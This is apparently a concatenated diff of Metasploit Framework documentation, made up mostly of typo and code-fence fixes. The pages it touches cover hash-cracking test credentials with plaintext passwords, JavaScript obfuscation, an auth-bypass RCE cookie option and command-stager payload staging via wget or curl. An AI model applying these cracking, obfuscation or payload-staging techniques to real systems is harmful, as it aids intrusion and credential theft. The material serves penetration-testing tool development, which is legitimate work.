The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
@@ -106,7 +106,7 @@ Enter passphrase: [...]
2. Modify your `.git/config` file to enable signing commits and merges by default:
````
```ini
[user]
name = Your Name
email = your_email@example.com
@@ -114,7 +114,7 @@ Enter passphrase: [...]
[alias]
c = commit -S --edit
m = merge -S --no-ff --edit
````
```
Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.
@@ -147,7 +147,7 @@ This method is just a stub on the Base mixin. It will be overridden in each Logi
For an example let's look at the attempt_login method from `Metasploit::Framework::LoginScanner::FTP (lib/metasploit/framework/login_scanner/ftp.rb)`
```ruby
```ruby
# (see Base#attempt_login)
def attempt_login(credential)
result_options = {
@@ -170,7 +170,7 @@ def attempt_login(credential)
::Metasploit::Framework::LoginScanner::Result.new(result_options)
end
```
```
### scan!
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/
|Download Link|File Type|SHA1|PGP|
|-|-|-|-|
| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
@@ -28,7 +28,7 @@ Difficulty: 3/5
### Enhance Sql Injection Support
Enable faster implementation of SQL injection based explot modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
Difficulty: 3/5
@@ -6,7 +6,7 @@ Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://g
### Retain active status of authentication tokens
Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for regstering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
Difficulty: 2/5
@@ -31,7 +31,7 @@ Difficulty: 3/5
### Enhanced LDAP Query & Collection
When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service.
When performing security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service.
Size: Medium/Large (Depends on proposal)
Difficulty: 3/5
@@ -84,6 +84,7 @@ This section will cover the differences between the two crackers. This is not a
| md5 (raw, unicode) | Raw-MD5u | 30 (with an empty salt) |
| NetNTLMv1 | netntlm | 5500 |
| NetNTLMv2 | netntlmv2 | 5600 |
| pbkdf2-sha256 | PBKDF2-HMAC-SHA256 | 10900 |
While Metasploit standardizes with the JtR format, the hashcat [library](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/password_crackers/cracker.rb) includes the `jtr_format_to_hashcat_format` function to translate from jtr to hashcat.
@@ -141,7 +142,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
## oracle (10) uses usernames in the hashing, so we can't overide that here
## oracle (10) uses usernames in the hashing, so we can't override that here
creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
## oracle 11/12 H value, username is used
@@ -149,47 +150,48 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
## postgres uses username, so we can't overide that here
## postgres uses username, so we can't override that here
creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
## other
creds add user:hmac_password hash:'<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5
creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6' jtr:dynamic_82
creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU' jtr:pbkdf2-sha256
```
This data breaks down to the following table:
| Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this |
| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ---------------- | ------------------------------------------------ | --------------------------------------------------------- |
| ----------- | ---------- | ------ | ---------- | ------------ | ------------------------------ | ------------------------- |
| DES | des_password | `rEK1ecacw.7.c` | password | des | | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
| MD5 | md5_password | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` | password | md5 | | auxiliary/analyze/crack_linux |
| BSDi | bsdi_password | `_J9..K0AyUubDrfOgO4s` | password | bsdi | | auxiliary/analyze/crack_linux |
| SHA256 | sha256_password | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5` | password | sha256,crypt | | auxiliary/analyze/crack_linux |
| SHA512 | sha512_password | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1` | password | sha512,crypt | | auxiliary/analyze/crack_linux |
| Blowfish | blowfish_password | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe` | password | bf | | auxiliary/analyze/crack_linux |
| Lanman | lm_password | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C` | password | lm | | auxiliary/analyze/crack_windows |
| NTLM | nt_password | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C` | password | nt | | auxiliary/analyze/crack_windows |
| NetNTLMv1 | u4-netntlm | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c` | hashcat | netntlm | | auxiliary/analyze/crack_windows |
| NetNTLMv2 | admin | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030` | hashcat | netntlmv2 | | auxiliary/analyze/crack_windows |
| MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
| MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
| Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
| Oracle | SYSTEM | `9EEDFA0AD26C6D52` | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
| Oracle 11 | DEMO | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
| Oracle 11 | oracle11_epsilon | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
| Oracle 12 | oracle12_epsilon | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B` | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
| Postgres | example | `md5be86a79bf2043622d58d5453c47d4860` | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/crack_databases |
| HMAC-MD5 | hmac_password | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9` | password | hmac-md5 | auxiliary/server/capture/smtp | None |
| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6` | TestPass123# | dynamic_82 | | None | | |
| | Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this | | | |
|---|--------------------------------------|--------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|--------------------|---------------------------------------------------|-----------------------------------------------------------|---|---|---|
| | DES | des_password | `rEK1ecacw.7.c` | password | des | | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux | | | |
| | MD5 | md5_password | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` | password | md5 | | auxiliary/analyze/crack_linux | | | |
| | BSDi | bsdi_password | `_J9..K0AyUubDrfOgO4s` | password | bsdi | | auxiliary/analyze/crack_linux | | | |
| | SHA256 | sha256_password | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5` | password | sha256,crypt | | auxiliary/analyze/crack_linux | | | |
| | SHA512 | sha512_password | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1` | password | sha512,crypt | | auxiliary/analyze/crack_linux | | | |
| | Blowfish | blowfish_password | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe` | password | bf | | auxiliary/analyze/crack_linux | | | |
| | Lanman | lm_password | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C` | password | lm | | auxiliary/analyze/crack_windows | | | |
| | NTLM | nt_password | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C` | password | nt | | auxiliary/analyze/crack_windows | | | |
| | NetNTLMv1 | u4-netntlm | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c` | hashcat | netntlm | | auxiliary/analyze/crack_windows | | | |
| | NetNTLMv2 | admin | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030` | hashcat | netntlmv2 | | auxiliary/analyze/crack_windows | | | |
| | MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | | | |
| | MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | | | |
| | MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | | | |
| | MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases | | | |
| | MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases | | | |
| | Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | | | |
| | Oracle | SYSTEM | `9EEDFA0AD26C6D52` | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | | | |
| | Oracle 11 | DEMO | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | | | |
| | Oracle 11 | oracle11_epsilon | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | | | |
| | Oracle 12 | oracle12_epsilon | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B` | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | | | |
| | Postgres | example | `md5be86a79bf2043622d58d5453c47d4860` | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/crack_databases | | | |
| | HMAC-MD5 | hmac_password | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9` | password | hmac-md5 | auxiliary/server/capture/smtp | None | | | |
| | SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6` | TestPass123# | dynamic_82 | | None | | | |
| | pbkdf2-sha256 | admin | `$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU` | admin | PBKDF2-HMAC-SHA256 | exploit/linux/http/apache_superset_cookie_sig_rce | auxiliary/analyze/webapp | | | |
# Adding a New Hash
Only hashes which were found in Metasploit were added to the hash id library, and the other functions. New hashes are developed often, and new modules which find a new type of hash will most definitely be created. So what are the steps to add a new hash type to Metasploit?
1. Add a new identify algorithm to: [framework/hashes/identify.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes/identify.rb). You may want to consult external programs such as `hashid` or `hash-identifier` for suggestions.
1. Add a new identify algorithm to: [framework/hashes.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes.rb). You may want to consult external programs such as `hashid` or `hash-identifier` for suggestions.
1. Add the hash to the spec to ensure it works right now, and in future updates: [framework/hashes/identify_spec.rb](https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/metasploit/framework/hashes/identify_spec.rb)
1. Make sure the hashes are saved in the DB in the JTR format. A good source to identify what the hashes look like is [pentestmonkey](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats).
1. If applicable, add it into the appropriate cracker module (or create a new one). Example for [Windows related hashes](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/analyze/crack_windows.rb).
@@ -59,7 +59,7 @@ The current available plugins for Metasploit can be found by running the `load -
The Alias plugin adds the ability to alias console commands:
```
```msf
msf6 > load alias
[*] Successfully loaded plugin: alias
msf6 > alias -h
@@ -87,7 +87,7 @@ Proxies => http:localhost:8079
Viewing registered aliases:
```
```msf
msf6 > alias
Current Aliases
@@ -62,9 +62,9 @@ res = @http_client.send_request_cgi({
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
### `cookie` option
Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
Shown below is the request used to login to a gitlab account in the [artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
```ruby
res = send_request_cgi({
@@ -38,7 +38,7 @@ For debugging purposes, it's always better to turn on the highest level of loggi
There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let's use one of the logging methods to explain what these arguments are about:
```
```ruby
def elog(msg, src = 'core', level = 0, from = caller)
```
@@ -50,7 +50,7 @@ And then you are ready to go.
The first thing you do with ObfuscateJS is you need to initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following:
```
```ruby
js = %Q|
var arrr = new Array();
arrr[0] = windows.document.createElement("img");
@@ -82,7 +82,7 @@ So if I want to obfuscate the variable ```arrr```, and I want to obfuscate the s
In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element's event handler, such as this:
```
```html
<html>
<head>
<script>
@@ -150,7 +150,7 @@ This time we'll do a "hello world" example:
And here's the output:
```
```javascript
window[(function () { var _d="t",y="ler",N="a"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })());
```
@@ -24,7 +24,7 @@ int main(void) {
require 'metasploit/framework/compiler/windows'
## Save as an exe varibale
## Save as an exe variable
exe = Metasploit::Framework::Compiler::Windows.compile_c(c_template)
## Save the binary as a file
@@ -119,4 +119,4 @@ int main() {
outfile = "/tmp/helloworld.exe"
weight = 70 # This value is used to determine how random the code gets.
Metasploit::Framework::Compiler::Windows.compile_random_c_to_file(outfile, c_source_code, weight: weight)
```
```
@@ -89,7 +89,7 @@ First ensure you are running the Metasploit database, and are running the JSON s
Request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Content-Type: application/json' \
@@ -118,7 +118,7 @@ Response:
Request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Content-Type: application/json' \
@@ -155,7 +155,7 @@ Response:
Request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'content-type: application/json' \
@@ -185,7 +185,7 @@ Response:
Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
auxiliary module against a target. For instance, with an Auxiliary module check request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Content-Type: application/json' \
@@ -205,7 +205,7 @@ curl --request POST \
Or an Exploit module check request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'content-type: application/json' \
@@ -240,7 +240,7 @@ The response will contain an identifier which can be used to query for updates:
Request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Content-Type: application/json' \
@@ -288,7 +288,7 @@ It is possible to poll for module results using the id returned when running a m
Request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Content-Type: application/json' \
@@ -353,7 +353,7 @@ but the memory is limited to 35mb as the memory datastore used is implemented by
Request:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Content-Type: application/json' \
@@ -445,7 +445,7 @@ curl --request POST \
Run the analyze command:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Authorization: Bearer ' \
@@ -491,7 +491,7 @@ Response:
When analyzing a host, it is also possible to specify payload requirements for additional granularity:
```
```sh
curl --request POST \
--url http://localhost:8081/api/v1/json-rpc \
--header 'Authorization: Bearer ' \
@@ -128,7 +128,7 @@ The best way to let the user decide what kind of payload to use is by defining s
Here is an example targets section from a command injection module:
```
```ruby
'Targets' => [
[
'Unix Command',
@@ -279,7 +279,7 @@ msf exploit(cmdstager_demo) > run
# Flavors
Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
stagers you can use. As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
stagers you can use. As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
Available flavors:
@@ -31,10 +31,11 @@ Here is the naming convention for fetch payloads:
`<cmd>/<platform>/<fetch protocol>/served_payload`
For example:
